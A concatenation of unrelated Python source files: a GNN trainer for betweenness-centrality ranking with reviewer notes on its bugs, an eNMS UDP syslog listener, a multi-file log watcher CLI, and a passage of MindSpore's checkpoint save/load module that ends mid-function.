            'cuda' if torch.cuda.is_available() else 'cpu')

    def build_model(self, input_dim):
        # NOTE(review): QweNet (defined above) accepts no `node_features_dim`
        # keyword; as written this call raises TypeError -- confirm the
        # intended constructor arguments.
        return QweNet(node_features_dim=input_dim)

    def clearTrainset(self):
        """Drop all training graphs and reset the train counter."""
        self.trainSet.clear()
        self.num_train = 0

    def clearTestset(self):
        """Drop all test/validation graphs and reset the test counter."""
        self.testSet.clear()
        self.num_test = 0

    def gen_graph(self, min_size, max_size, graph_type):
        """Generate one random graph with size drawn from [min_size, max_size).

        graph_type selects the generator: 0 Erdos-Renyi, 1 connected
        Watts-Strogatz, 2 Barabasi-Albert, 3 powerlaw-cluster.
        """
        graph_size = (int)(np.random.randint(min_size, max_size, 1))
        gen_graphs = [lambda graph_size: nx.erdos_renyi_graph(n=graph_size, p=0.15),
                      lambda graph_size: nx.connected_watts_strogatz_graph(
                          n=graph_size, k=8, p=0.1),
                      lambda graph_size: nx.barabasi_albert_graph(
                          n=graph_size, m=4),
                      lambda graph_size: nx.powerlaw_cluster_graph(
                          n=graph_size, m=4, p=0.05)
                      ]
        return gen_graphs[graph_type](graph_size)

    def insert_data(self, g, isTrain=True, label=None):
        """Convert networkx graph `g` into a PyG data object with BC labels
        and node features, and append it to the train or test set.

        If `label` is None, betweenness centrality is computed here (the
        parallel variant for graphs with more than 1000 nodes).
        """
        graph_data = from_networkx(g)
        btres = {}
        if label is None:
            if g.order() > 1000:
                pbc(g, btres=btres)
            else:
                btres = nx.betweenness_centrality(g)
            label = [btres[node] for node in g.nodes]
        graph_data.y = torch.tensor(label, dtype=torch.float32)
        # Node features: one approximate-BC column plus two constant columns.
        feature, _ = generate_bc_feature(g, sampler=2)
        bc_feature = np.array([feature[node]
                               for node in g.nodes]).reshape((g.order(), 1))
        aux_feature = np.ones((g.order(), 2))
        node_feature = np.concatenate([bc_feature, aux_feature], axis=1)
        graph_data.x = torch.from_numpy(node_feature).type(torch.float32)
        if isTrain:
            self.trainSet.append(graph_data)
            self.num_train += 1
        else:
            self.testSet.append(graph_data)
            self.num_test += 1

    def prepareValidData(self, n_data, min_size, max_size, types):
        """Regenerate the validation set with n_data random graphs.

        `types` must have length n_data (per-graph type) or 1 (shared type).
        """
        print('\ngenerating validation graphs...')
        sys.stdout.flush()
        self.clearTestset()
        assert (len(types) == n_data or len(types) == 1)
        for i in tqdm(range(n_data)):
            graph_type = types[0] if len(types) == 1 else types[i]
            g = self.gen_graph(min_size, max_size, graph_type)
            self.insert_data(g, isTrain=False)

    def gen_new_graph(self, min_size, max_size, types, num_graph=1000):
        """Regenerate the training set with num_graph random graphs."""
        print('\ngenerating new training graphs...')
        self.clearTrainset()
        assert (len(types) == num_graph or len(types) == 1)
        p_list = []
        for i in tqdm(range(num_graph)):
            graph_type = types[0] if len(types) == 1 else types[i]
            g = self.gen_graph(min_size, max_size, graph_type)
            # The triple-quoted block below is disabled multiprocessing code,
            # kept verbatim as a no-op string statement.
            """
            p = multiprocessing.Process(target = self.insert_data, args=(g, True, ))
            p.start()
            p_list.append(p)
            """
            self.insert_data(g, isTrain=True)

    def pairwise_ranking_loss(self, preds, labels, seed=42):
        """Pairwise ranking loss: BCE-with-logits between prediction
        differences and sigmoid(label differences) over two fixed-seed
        random permutations of the indices.
        """
        np.random.seed(seed)
        assert len(preds) == len(labels)
        id_src = np.random.permutation(len(preds))
        id_des = np.random.permutation(len(preds))
        # y = np.ones((len(pred,)))
        # y[labels[id_src] - labels[id_des] < 0] = -1
        # loss = F.margin_ranking_loss(pred[id_src], pred[id_des], y)
        pred_res = preds[id_src] - preds[id_des]
        label_res = labels[id_src] - labels[id_des]
        # NOTE(review): `size_average` is deprecated in modern PyTorch
        # (reduction='sum' is the replacement); kept as-is here.
        lossL = nn.BCEWithLogitsLoss(size_average=False)
        label_res = label_res.view(pred_res.size())
        loss = lossL(pred_res, torch.sigmoid(label_res))
        return torch.mean(loss)

    def train(self, model, optimizer, criterion, max_epoch):
        """Main training loop: refreshes the training graphs periodically,
        validates every `num_percheck` iterations, checkpoints the model,
        and logs metrics to TensorBoard and `ValidValue.csv`.
        """
        flag = True
        model = model.to(self.device)
        types = [0]
        self.prepareValidData(N_VALID, min_size=MIN_SIZE,
                              max_size=MAX_SIZE, types=types)
        self.gen_new_graph(MIN_SIZE, MAX_SIZE, types, num_graph=N_TRAIN)
        save_dir = './../model'
        vcfile = '%s/ValidValue.csv' % save_dir
        # NOTE(review): f_out is only closed after the full loop; an
        # exception mid-training leaks the handle (consider `with`).
        f_out = open(vcfile, 'w')
        for iter in range(max_epoch):  # NOTE(review): shadows builtin iter()
            print(iter)
            num = 0
            model.train()
            running_loss = 0.0
            train_loader = DataLoader(
                self.trainSet, batch_size=BATCH_SIZE, shuffle=True, drop_last=False)
            for data_batch in train_loader:
                num += 1
                data_batch = data_batch.to(self.device)
                optimizer.zero_grad()
                with torch.set_grad_enabled(True):
                    pred = model(data_batch)
                    # if flag:
                    #     writer.add_graph(model, data_batch, verbose= True)
                    #     flag = False
                    true_value = data_batch.y
                    loss = criterion(pred, true_value)
                    loss.backward()
                    optimizer.step()
                    running_loss += loss.item()
            # NOTE(review): time.clock() was removed in Python 3.8; this line
            # raises AttributeError on modern interpreters
            # (time.perf_counter() is the documented replacement).
            start = time.clock()
            if iter and iter % 5000 == 0:
                # Periodically regenerate training graphs to avoid overfitting
                # a fixed synthetic set.
                self.gen_new_graph(MIN_SIZE, MAX_SIZE,
                                   types, num_graph=N_TRAIN)
            if iter % num_percheck == 0:
                if iter == 0:
                    N_start = start
                else:
                    N_start = N_end
                frac_topk, frac_kendal = 0.0, 0.0
                test_start = time.time()
                for idx in range(N_VALID):
                    run_time, temp_topk, temp_kendal = self.test(model, idx)
                    frac_topk += temp_topk / N_VALID
                    frac_kendal += temp_kendal / N_VALID
                test_end = time.time()
                # write vc into the file
                f_out.write('%.6f, %.6f\n' % (frac_topk, frac_kendal))
                f_out.flush()
                print('\niter %d, Top0.01: %.6f, kendal: %.6f' %
                      (iter, frac_topk, frac_kendal))
                print('testing %d graphs time: %.2fs' %
                      (N_VALID, test_end - test_start))
                N_end = time.clock()
                print('%d iterations total time: %.2fs' %
                      (num_percheck, N_end - N_start))
                print('Training loss is %.4f' % loss)
                sys.stdout.flush()
                model_path = '%s/nrange_iter_%d_%d_%d.pkl' % (
                    save_dir, MIN_SIZE, MAX_SIZE, iter)
                self.saveModel(model_path, model)
            # NOTE(review): the add_scalar call below reuses `i` (the last
            # enumerate index of this loop) as the global step.
            for i, (name, param) in enumerate(model.named_parameters()):
                if 'bn' not in name:
                    writer.add_histogram(name, param, 0)
            writer.add_scalar('loss', running_loss, i)
        f_out.close()

    def predict(self, model, data):
        """Return model predictions for one PyG data object as a numpy array."""
        model.eval()
        data = data.to(self.device)
        pred = model(data).cpu().detach().numpy()
        return pred

    def test(self, model, idx):
        """Evaluate on testSet[idx]; returns (run_time, top-1% overlap,
        Kendall tau)."""
        data = self.testSet[idx]
        start = time.time()
        pred = self.predict(model, data)
        # NOTE(review): `iter` here is the builtin (no loop variable in this
        # scope), so every histogram is logged under the same tag.
        writer.add_histogram("%s_pred" % iter, pred)
        pred = pred.T.squeeze()
        # np.save('%ietr_pred.npy'% iter, pred)
        end = time.time()
        betw = data.y.cpu().detach().numpy()
        # np.save('%ietr_true.npy' % iter, betw)
        run_time = end - start
        topk = ranktopk(pred, betw, percent=0.01)
        kendal, p_value = kd(betw, pred, nan_policy="omit")
        return run_time, topk, kendal

    def saveModel(self, model_path, model):
        """Persist model weights to `model_path`."""
        torch.save({
            'model_weights': model.state_dict()
        }, model_path)
        print('model has been saved success!')

    def findModel(self):
        """Pick a checkpoint via simple early stopping on the first column of
        ValidValue.csv (stop once the metric drops below the recent mean).
        """
        VCFile = './models/ValidValue.csv'
        vc_list = []
        EarlyStop_start = 2
        EarlyStop_length = 1
        num_line = 0
        for line in open(VCFile):
            data = float(line.split(',')[0].strip(',')) # 0:topK; 1:kendal
            vc_list.append(data)
            num_line += 1
            if num_line > EarlyStop_start and data < np.mean(vc_list[-(EarlyStop_length + 1):-1]):
                best_vc = num_line
                break
        # NOTE(review): best_vc is unbound (NameError) when the early-stop
        # condition never triggers; the file handle above is also never
        # closed explicitly.
        best_model_iter = num_percheck * best_vc
        best_model = './models/nrange_iter_%d.ckpt' % (best_model_iter)
        return best_model

    def evaluateSynData(self, model, data_test, model_file=None): # test synthetic data
        """Evaluate `model` on a pickled list of PyG graphs at `data_test`,
        loading `model_file` (or the early-stopped best checkpoint)."""
        if model_file is None: # if user do not specify the model_file
            model_file = self.findModel()
            print('The best model is :%s' % (model_file))
        sys.stdout.flush()
        self.loadModel(model_file, model)
        frac_run_time, frac_topk, frac_kendal = 0.0, 0.0, 0.0
        self.clearTestset()
        f = open(data_test, 'rb')
        # NOTE(review): pickle.load on untrusted files can execute arbitrary
        # code -- only load trusted datasets.
        ValidData = pickle.load(f)
        self.testSet = ValidData
        n_test = min(100, len(self.testSet))
        for i in tqdm(range(n_test)):
            run_time, topk, kendal = self.test(model, i)
            frac_run_time += run_time / n_test
            frac_topk += topk / n_test
            frac_kendal += kendal / n_test
        print('\nRun_time, Top0.01, Kendall tau: %.6f, %.6f, %.6f' %
              (frac_run_time, frac_topk, frac_kendal))
        return frac_run_time, frac_topk, frac_kendal

    def evaluateRealData(self, model, model_file, graph_file, label_file): # test real data
        """Evaluate on a real-world weighted edge list with ground-truth BC
        labels; returns (top0.01, top0.05, top0.1, kendall, run_time)."""
        g = nx.read_weighted_edgelist(graph_file, nodetype = int)
        sys.stdout.flush()
        model = model.to(self.device)
        self.loadModel(model_file, model)
        betw_label = []
        for line in open(label_file):
            betw_label.append(float(line.strip().split()[1]))
        start = time.time()
        # NOTE(review): requires clearTestset() to have run at least once
        # beforehand, otherwise self.num_test is undefined in insert_data.
        self.insert_data(g, isTrain=False, label=betw_label)
        end = time.time()
        run_time = end - start
        start1 = time.time()
        data = self.testSet[0]
        betw_predict = self.predict(model, data)
        end1 = time.time()
        betw_label = data.y
        run_time += end1 - start1
        top001 = ranktopk(betw_label, betw_predict, 0.01)
        top005 = ranktopk(betw_label, betw_predict, 0.05)
        top01 = ranktopk(betw_label, betw_predict, 0.1)
        kendal = kd(betw_label, betw_predict)
        self.clearTestset()
        return top001, top005, top01, kendal, run_time

    def loadModel(self, model_path, model):
        """Load weights saved by saveModel into `model` in place."""
        model_hist = torch.load(model_path)
        model.load_state_dict(model_hist['model_weights'])
        print('restore model from file successfully')
|
syslog.py | from socketserver import BaseRequestHandler, UDPServer
from threading import Thread
from eNMS.database import db
class SyslogServer:
    """UDP syslog listener: binds on construction and serves forever on a
    daemon thread, dispatching each datagram to SyslogUDPHandler."""

    def __init__(self, ip_address, port):
        self.ip_address = ip_address
        self.port = port
        self.start()

    def start(self):
        """Bind the UDP socket and launch the background serving thread."""
        # Allow quick rebinding of the port across restarts.
        UDPServer.allow_reuse_address = True
        self.server = UDPServer((self.ip_address, self.port), SyslogUDPHandler)
        worker = Thread(target=self.server.serve_forever, daemon=True)
        worker.start()
class SyslogUDPHandler(BaseRequestHandler):
    """Per-datagram handler: resolves the sending device and feeds the
    decoded message to every configured event matcher."""

    def handle(self):
        sender_ip = self.client_address[0]
        device = db.fetch("device", allow_none=True, ip_address=sender_ip)
        if device:
            source = device.name
        else:
            source = sender_ip
        content = str(bytes.decode(self.request[0].strip()))
        properties = {"source": source, "content": content}
        for event in db.fetch_all("event"):
            event.match_log(**properties)
|
watchlogs.py | """A simple log file watcher to provide `tail -F` style functionality across multilple
logfiles. The syntax is simply: `watchlogs --log_files log1.txt,log2.txt,....`
"""
import sys
import math
import time
import argparse
import threading
from typing import Callable, Union, List
from pathlib import Path
import tailf
import psutil
import colored
import humanize
from typeguard import typechecked
def memory_summary():
    """Print a one-line summary of current system memory usage."""
    stats = psutil.virtual_memory()
    used = humanize.naturalsize(stats.used)
    available = humanize.naturalsize(stats.available)
    print(f">>> Currently using {stats.percent}% of system memory {used}/{available}")
def get_colors(n_colors):
    """Return n_colors distinct hex colors, evenly spaced in hue."""
    import hsluv  # local import keeps hsluv optional until colors are needed
    colors = []
    for idx in range(n_colors):
        hue = idx * 360.0 / n_colors
        colors.append(hsluv.hpluv_to_hex((hue, 90, 65)))
    return colors
class Watcher:
    """Tails a collection of log files concurrently (one thread per file),
    echoing new lines to stdout in a per-file color."""

    def __init__(
        self,
        watched_logs: List[Path],
        conserve_resources: int,
        heartbeat: bool,
        prev_buffer_size: int = 20,
        verbose: bool = False,
        halting_condition: Callable = None,
    ):
        # Map of absolute path (str) -> {"color": hex str, "tailf": tailf.Tail}.
        self._watched_logs = {}
        self.verbose = verbose
        self.prev_buffer_size = prev_buffer_size
        self.heartbeat = heartbeat
        self.halting_condition = halting_condition
        self.conserve_resources = conserve_resources
        colors = get_colors(len(watched_logs))
        # Tracks which file printed last so the path banner is only emitted
        # when output switches files.
        self.last_path = None
        for path, color in zip(watched_logs, colors):
            path = Path(path).resolve()
            # Create missing log files so tailf can attach immediately.
            if not path.exists():
                with open(path, "w") as f:
                    f.write("")
            self._watched_logs[str(path)] = {
                "color": color,
                "tailf": tailf.Tail(str(path)),
            }

    def log_content(self, path, lines, last_mod=False):
        """Print `lines` from `path` in its assigned color, prefixing a path
        banner whenever output switches to a different file."""
        color = self._watched_logs[path]["color"]
        for line in lines:
            summary = ""
            if path != self.last_path:
                summary += f"\n{path} >>>\n"
            summary += line
            if last_mod:
                summary = f"[stale log] ({last_mod}): {summary}"
            print(colored.stylize(summary, colored.fg(color)), flush=True)
            self.last_path = path

    @typechecked
    def watch_log(
        self,
        path: Union[Path, str],
        watcher_idx: int,
        total_watchers: int,
    ):
        """Worker loop for one file: print the requested tail of existing
        content, then follow new lines until the halting condition fires or
        the file disappears."""
        # Unicode is not very robust to broken line fragments, so we fall back to a
        # more permissive (if inaccurate) encoding if UTF-8 fails
        try:
            with open(path, "r", encoding="utf-8") as f:
                lines = f.read().splitlines()
        except UnicodeDecodeError:
            with open(path, "r", encoding="ISO-8859-1") as f:
                lines = f.read().splitlines()
        # print as much of the existing file as requested (via prev_buffer_size)
        if self.prev_buffer_size > -1:
            lines = lines[-self.prev_buffer_size:]
        self.log_content(path, lines)
        num_digits = math.ceil(math.log(total_watchers, 10))
        if not lines:
            lines = [""]
        # `latest` remembers the newest line and when it was seen, feeding
        # the heartbeat staleness message.
        latest = {"line": lines[-1], "tic": time.time()}
        while True:
            if self.halting_condition is not None and self.halting_condition():
                return
            if self.heartbeat:
                if latest["line"] == lines[-1]:
                    delta = time.time() - latest["tic"]
                    duration = time.strftime('%Hh%Mm%Ss', time.gmtime(delta))
                    watcher_str = f"{watcher_idx}".zfill(num_digits)
                    summary = f"Log {watcher_str}/{total_watchers}"
                    msg = f"\r{summary} has had no update for {duration}"
                    print(msg, end="", flush=True)
            if self.conserve_resources:
                # Sleep between polls to cut CPU usage.
                time.sleep(self.conserve_resources)
            try:
                # tailf yields raw bytes for appended data, or a Truncated
                # marker when the file shrank.
                for event in self._watched_logs[path]["tailf"]:
                    if isinstance(event, bytes):
                        try:
                            line = event.decode("utf-8")
                        except UnicodeDecodeError:
                            line = event.decode("ISO-8859-1")
                    elif event is tailf.Truncated:
                        line = "File was truncated"
                    else:
                        assert False, "unreachable"
                    lines = [line.rstrip()]
                    self.log_content(path, lines)
                    latest = {"line": lines[-1], "tic": time.time()}
            except FileNotFoundError:
                msg = f"Log at {path} has been removed, exiting watcher thread..."
                print(msg, flush=True)
                sys.exit()

    def run(self):
        """Start one watcher thread per file (or watch inline for one file)."""
        if len(self._watched_logs) > 1:
            threads = []
            total = len(self._watched_logs)
            for ii, path in enumerate(self._watched_logs):
                x = threading.Thread(target=self.watch_log, args=(path, ii, total))
                threads.append(x)
                x.start()
            for x in threads:
                x.join()
        else:
            path = list(self._watched_logs.keys())[0]
            self.watch_log(path, watcher_idx=0, total_watchers=1)
def main():
    """CLI entry point: parse arguments, resolve the watched files, and run
    the Watcher (optionally bounded by --max_duration_secs)."""
    parser = argparse.ArgumentParser(description="watchlogs tool")
    parser.add_argument("log_files", help="comma-separated list of logfiles to watch")
    parser.add_argument("--pattern",
                        help=("if supplied, --log_files should point to a directory and "
                              "`pattern` will be used to glob for files"))
    # Fixed: the multi-part help strings below were implicitly concatenated
    # without separating spaces ("reduceCPU", "watchingis", "to-1"), and
    # "give" -> "given".
    parser.add_argument("--conserve_resources", type=int, default=5,
                        help=("if true, add a short sleep between log checks to reduce "
                              "CPU load (will wait for the given number of seconds)"))
    parser.add_argument("--heartbeat", type=int, default=1,
                        help=("if true, print out markers showing that the log watching "
                              "is still active"))
    parser.add_argument("--prev_buffer_size", type=int, default=20,
                        help=("Print this many lines from the existing file. If set to "
                              "-1, print the entire file"))
    parser.add_argument("--verbose", action="store_true")
    parser.add_argument("--max_duration_secs", type=int, default=0,
                        help="if given, only watch files for at most this duration")
    args = parser.parse_args()

    if args.pattern:
        msg = "if args.pattern is supplied, args.log_files should point to a directory"
        assert Path(args.log_files).is_dir(), msg
        watched_logs = sorted(list(Path(args.log_files).glob(f"*{args.pattern}")))
        print(f"Found {len(watched_logs)} matching pattern: {args.pattern}")
    else:
        watched_logs = [Path(x) for x in args.log_files.split(",")]

    memory_summary()

    if args.max_duration_secs:
        init_time = time.time()

        def halting_condition():
            # Tell all watcher threads to stop once the allotted time passes.
            return time.time() - init_time > args.max_duration_secs
    else:
        halting_condition = None

    Watcher(
        verbose=args.verbose,
        watched_logs=watched_logs,
        heartbeat=bool(args.heartbeat),
        prev_buffer_size=args.prev_buffer_size,
        conserve_resources=args.conserve_resources,
        halting_condition=halting_condition,
    ).run()
if __name__ == "__main__":
main()
|
serialization.py | # Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Model and parameters serialization."""
import os
import stat
import math
from threading import Thread, Lock
import numpy as np
import mindspore.nn as nn
from mindspore import log as logger
from mindspore.train.checkpoint_pb2 import Checkpoint
from mindspore.train.print_pb2 import Print
from mindspore.train.node_strategy_pb2 import ParallelStrategyMap
from mindspore.common.tensor import Tensor
from mindspore.common.initializer import initializer
from mindspore.common.parameter import Parameter
from mindspore.common.api import _executor
from mindspore.common import dtype as mstype
from mindspore._checkparam import check_input_data, Validator
from mindspore.compression.export import quant_export
import mindspore.context as context
__all__ = ["save_checkpoint", "load_checkpoint", "load_param_into_net", "export", "parse_print",
"build_searched_strategy", "merge_sliced_parameter"]
tensor_to_ms_type = {"Int8": mstype.int8, "Uint8": mstype.uint8, "Int16": mstype.int16, "Uint16": mstype.uint16,
"Int32": mstype.int32, "Uint32": mstype.uint32, "Int64": mstype.int64, "Uint64": mstype.uint64,
"Float16": mstype.float16, "Float32": mstype.float32, "Float64": mstype.float64,
"Bool": mstype.bool_}
tensor_to_np_type = {"Int8": np.int8, "Uint8": np.uint8, "Int16": np.int16, "Uint16": np.uint16,
"Int32": np.int32, "Uint32": np.uint32, "Int64": np.int64, "Uint64": np.uint64,
"Float16": np.float16, "Float32": np.float32, "Float64": np.float64, "Bool": np.bool_}
_ckpt_mutex = Lock()
SLICE_SIZE = 512 * 1024 * 1024
def _special_process_par(par, new_par):
    """
    Processes the special condition.

    Like (12,2048,1,1)->(12,2048), this case is caused by GE 4 dimensions tensor.
    Attempts to squeeze `new_par`'s extra trailing dimensions so its data fits
    `par`'s shape; returns True if `par` was updated, False otherwise.
    """
    par_shape_len = len(par.data.shape)
    new_par_shape_len = len(new_par.data.shape)
    delta_len = new_par_shape_len - par_shape_len
    delta_i = 0
    # Scan the extra trailing dims; stop at the first one that is not 1.
    for delta_i in range(delta_len):
        if new_par.data.shape[par_shape_len + delta_i] != 1:
            break
    # NOTE(review): if the loop breaks on the LAST extra dim, delta_i still
    # equals delta_len - 1, so the reshape below is attempted even though
    # that dim is not 1 -- confirm this guard is intended.
    if delta_i == delta_len - 1:
        new_val = new_par.data.asnumpy()
        new_val = new_val.reshape(par.data.shape)
        par.set_data(Tensor(new_val, par.data.dtype))
        return True
    return False
def _update_param(param, new_param):
    """Updates param's data from new_param's data.

    Handles tensor<-tensor (with dtype/shape checks and the GE trailing-dim
    special case), tensor<-scalar, and scalar<-scalar combinations; raises
    RuntimeError on any incompatibility.
    """
    if isinstance(param.data, Tensor) and isinstance(new_param.data, Tensor):
        if param.data.dtype != new_param.data.dtype:
            logger.error("Failed to combine the net and the parameters for param %s.", param.name)
            msg = ("Net parameters {} type({}) different from parameter_dict's({})"
                   .format(param.name, param.data.dtype, new_param.data.dtype))
            raise RuntimeError(msg)

        if param.data.shape != new_param.data.shape:
            # Shapes differ: only the GE trailing-singleton case is tolerated.
            if not _special_process_par(param, new_param):
                logger.error("Failed to combine the net and the parameters for param %s.", param.name)
                msg = ("Net parameters {} shape({}) different from parameter_dict's({})"
                       .format(param.name, param.data.shape, new_param.data.shape))
                raise RuntimeError(msg)
            return

        param.set_data(new_param.data)
        return

    if isinstance(param.data, Tensor) and not isinstance(new_param.data, Tensor):
        # Loading a scalar into a tensor parameter is only valid for
        # one-element or zero-dim shapes.
        if param.data.shape != (1,) and param.data.shape != ():
            logger.error("Failed to combine the net and the parameters for param %s.", param.name)
            msg = ("Net parameters {} shape({}) is not (1,), inconsitent with parameter_dict's(scalar)."
                   .format(param.name, param.data.shape))
            raise RuntimeError(msg)
        param.set_data(initializer(new_param.data, param.data.shape, param.data.dtype))
    elif isinstance(new_param.data, Tensor) and not isinstance(param.data, Tensor):
        logger.error("Failed to combine the net and the parameters for param %s.", param.name)
        msg = ("Net parameters {} type({}) different from parameter_dict's({})"
               .format(param.name, type(param.data), type(new_param.data)))
        raise RuntimeError(msg)
    else:
        # Both scalars: coerce the new value to the existing Python type.
        param.set_data(type(param.data)(new_param.data))
def _exec_save(ckpt_file_name, data_list):
    """Execute save checkpoint into file process.

    Serializes every entry of `data_list` ({name: [dims, type_str, ndarray]})
    into `ckpt_file_name` as concatenated Checkpoint protobuf messages,
    splitting tensors larger than SLICE_SIZE, then makes the file read-only.
    """
    try:
        with _ckpt_mutex:
            if os.path.exists(ckpt_file_name):
                os.remove(ckpt_file_name)
            with open(ckpt_file_name, "ab") as f:
                for name, value in data_list.items():
                    data_size = value[2].nbytes
                    # Split very large tensors so a single protobuf message
                    # stays below SLICE_SIZE bytes.
                    if data_size > SLICE_SIZE:
                        slice_count = math.ceil(data_size / SLICE_SIZE)
                        param_slice_list = np.array_split(value[2], slice_count)
                    else:
                        param_slice_list = [value[2]]

                    for param_slice in param_slice_list:
                        checkpoint_list = Checkpoint()
                        param_value = checkpoint_list.value.add()
                        param_value.tag = name
                        param_tensor = param_value.tensor
                        param_tensor.dims.extend(value[0])
                        param_tensor.tensor_type = value[1]
                        # Fixed: tobytes() replaces the deprecated
                        # ndarray.tostring() (removed in NumPy 2.0); the
                        # produced bytes are identical.
                        param_tensor.tensor_content = param_slice.tobytes()
                        f.write(checkpoint_list.SerializeToString())

        # Checkpoints are written once and then treated as read-only.
        os.chmod(ckpt_file_name, stat.S_IRUSR)
    except BaseException as e:
        logger.error("Failed to save the checkpoint file %s.", ckpt_file_name)
        raise e
def save_checkpoint(save_obj, ckpt_file_name, integrated_save=True, async_save=False):
    """
    Saves checkpoint info to a specified file.

    Args:
        save_obj (nn.Cell or list): The cell object or data list(each element is a dictionary, like
                                    [{"name": param_name, "data": param_data},...], the type of param_name would
                                    be string, and the type of param_data would be parameter or tensor).
        ckpt_file_name (str): Checkpoint file name. If the file name already exists, it will be overwritten.
        integrated_save (bool): Whether to integrated save in automatic model parallel scene. Default: True
        async_save (bool): Whether asynchronous execution saves the checkpoint to a file. Default: False

    Raises:
        TypeError: If the parameter save_obj is not nn.Cell or list type.And if the parameter integrated_save and
                   async_save are not bool type.
    """
    if not isinstance(save_obj, nn.Cell) and not isinstance(save_obj, list):
        raise TypeError("The parameter save_obj should be nn.Cell or list, but got {}".format(type(save_obj)))
    integrated_save = Validator.check_bool(integrated_save)
    async_save = Validator.check_bool(async_save)

    logger.info("Execute save checkpoint process.")

    # Normalize an nn.Cell into the list-of-dicts form used below.
    if isinstance(save_obj, nn.Cell):
        save_obj.init_parameters_data()
        param_dict = {}
        for _, param in save_obj.parameters_and_names():
            param_dict[param.name] = param
        param_list = []
        for (key, value) in param_dict.items():
            each_param = {"name": key}
            param_data = Tensor(value.data)

            # in automatic model parallel scenario, some parameters were spliteds to all the devices,
            # which should be combined before saving
            if integrated_save and key in save_obj.parameter_layout_dict:
                param_data = _get_merged_param_data(save_obj, key, param_data)

            each_param["data"] = param_data
            param_list.append(each_param)
        save_obj = param_list

    # Flatten each parameter into [dims, type string, 1-D ndarray] under the
    # checkpoint mutex so concurrent saves don't interleave.
    data_list = {}
    with _ckpt_mutex:
        for param in save_obj:
            key = param["name"]
            data_list[key] = []
            if isinstance(param["data"], Parameter):
                param["data"].init_data()
            dims = []
            # A zero-dim (scalar) tensor is recorded with the sentinel dim [0].
            if param['data'].shape == ():
                dims.append(0)
            else:
                for dim in param['data'].shape:
                    dims.append(dim)
            data_list[key].append(dims)
            tensor_type = str(param["data"].dtype)
            data_list[key].append(tensor_type)
            data = param["data"].asnumpy().reshape(-1)
            data_list[key].append(data)

    if async_save:
        # Fire-and-forget writer thread; _exec_save re-acquires _ckpt_mutex.
        thr = Thread(target=_exec_save, args=(ckpt_file_name, data_list), name="asyn_save_ckpt")
        thr.start()
    else:
        _exec_save(ckpt_file_name, data_list)

    logger.info("Save checkpoint process finish.")
def _check_param_prefix(filter_prefix, param_name):
"""Checks whether the prefix of parameter name matches the given filter_prefix."""
for prefix in filter_prefix:
if param_name.find(prefix) == 0 \
and (param_name == prefix or param_name[len(prefix)] == "." or (prefix and prefix[-1] == ".")):
return True
return False
def load_checkpoint(ckpt_file_name, net=None, strict_load=False, filter_prefix=None):
    """
    Loads checkpoint info from a specified file.

    Args:
        ckpt_file_name (str): Checkpoint file name.
        net (Cell): Cell network. Default: None
        strict_load (bool): Whether to strict load the parameter into net. If False, it will load parameter
                            in the param_dict into net with the same suffix. Default: False
        filter_prefix (Union[str, list[str], tuple[str]]): Parameter with the filter prefix will not be loaded.
            Default: None.

    Returns:
        Dict, key is parameter name, value is a Parameter.

    Raises:
        ValueError: Checkpoint file is incorrect.

    Examples:
        >>> ckpt_file_name = "./checkpoint/LeNet5-2_1875.ckpt"
        >>> param_dict = load_checkpoint(ckpt_file_name, filter_prefix="conv1")
    """
    # ---- argument validation ----
    if not isinstance(ckpt_file_name, str):
        raise ValueError("The ckpt_file_name must be string.")
    if not os.path.exists(ckpt_file_name):
        raise ValueError("The checkpoint file is not exist.")
    if ckpt_file_name[-5:] != ".ckpt":
        raise ValueError("Please input the correct checkpoint file name.")
    if os.path.getsize(ckpt_file_name) == 0:
        raise ValueError("The checkpoint file may be empty, please make sure enter the correct file name.")

    if filter_prefix is not None:
        if not isinstance(filter_prefix, (str, list, tuple)):
            raise TypeError(f"The type of filter_prefix must be str, list[str] or tuple[str] "
                            f"when filter_prefix is not None, but got {str(type(filter_prefix))}.")
        if isinstance(filter_prefix, str):
            filter_prefix = (filter_prefix,)
        if not filter_prefix:
            raise ValueError("The filter_prefix can't be empty when filter_prefix is list or tuple.")
        for index, prefix in enumerate(filter_prefix):
            if not isinstance(prefix, str):
                raise TypeError(f"The type of filter_prefix must be str, list[str] or tuple[str], "
                                f"but got {str(type(prefix))} at index {index}.")

    logger.info("Execute load checkpoint process.")
    checkpoint_list = Checkpoint()

    # ---- read and parse the protobuf file ----
    try:
        with open(ckpt_file_name, "rb") as f:
            pb_content = f.read()
        checkpoint_list.ParseFromString(pb_content)
    except BaseException as e:
        logger.error("Failed to read the checkpoint file `%s`, please check the correct of the file.", ckpt_file_name)
        raise ValueError(e.__str__())

    parameter_dict = {}
    try:
        param_data_list = []
        for element_id, element in enumerate(checkpoint_list.value):
            if filter_prefix is not None and _check_param_prefix(filter_prefix, element.tag):
                continue
            data = element.tensor.tensor_content
            data_type = element.tensor.tensor_type
            np_type = tensor_to_np_type[data_type]
            ms_type = tensor_to_ms_type[data_type]
            element_data = np.frombuffer(data, np_type)
            param_data_list.append(element_data)
            # Consecutive elements with the same tag are slices of one large
            # tensor (see SLICE_SIZE in _exec_save); merge when the run ends.
            if (element_id == len(checkpoint_list.value) - 1) or \
                    (element.tag != checkpoint_list.value[element_id + 1].tag):
                param_data = np.concatenate((param_data_list), axis=0)
                param_data_list.clear()
                dims = element.tensor.dims

                if dims == [0]:
                    # dims [0] is the scalar sentinel written by save_checkpoint.
                    if 'Float' in data_type:
                        param_data = float(param_data[0])
                    elif 'Int' in data_type:
                        param_data = int(param_data[0])
                    parameter_dict[element.tag] = Parameter(Tensor(param_data, ms_type), name=element.tag)
                elif dims == [1]:
                    parameter_dict[element.tag] = Parameter(Tensor(param_data, ms_type), name=element.tag)
                else:
                    param_dim = []
                    for dim in dims:
                        param_dim.append(dim)
                    param_value = param_data.reshape(param_dim)
                    parameter_dict[element.tag] = Parameter(Tensor(param_value, ms_type), name=element.tag)

        logger.info("Load checkpoint process finish.")
    except BaseException as e:
        logger.error("Failed to load the checkpoint file `%s`.", ckpt_file_name)
        raise RuntimeError(e.__str__())

    if not parameter_dict:
        raise ValueError(f"The loaded parameter dict is empty after filtering, please check filter_prefix.")

    if net is not None:
        load_param_into_net(net, parameter_dict, strict_load)

